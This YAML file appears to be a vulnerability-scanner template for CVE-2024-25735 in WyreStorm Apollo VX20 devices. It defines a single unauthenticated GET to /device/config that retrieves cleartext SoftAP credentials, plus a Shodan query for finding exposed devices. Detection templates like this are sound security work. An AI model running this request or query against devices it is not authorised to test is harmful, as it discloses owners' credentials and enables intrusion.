41 lines
1.3 KiB
YAML
41 lines
1.3 KiB
YAML
id: CVE-2024-25735
|
|
|
|
info:
|
|
name: WyreStorm Apollo VX20 - Information Disclosure
|
|
author: johnk3r
|
|
severity: high
|
|
description: |
|
|
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.
|
|
reference:
|
|
- https://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt
|
|
- https://packetstormsecurity.com/files/cve/CVE-2024-25735
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: wyrestorm
|
|
product: apollo vx20
|
|
shodan-query: ssl:"WyreStorm Apollo VX20"
|
|
tags: cve,cve2024,wyrestorm,info-leak
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/device/config"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '"password":'
|
|
- '"softAp":'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'application/json'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a0046304402206a8dacddb441d7a1b82e425f1534b162e76d204f4ef3e0bc5e6286afbbcaf0c2022039d6fd9a23015b210888466c68571722e605c58a4158b8a2b20b27fe51005088:922c64590222798bb761d5b6d8e72950 |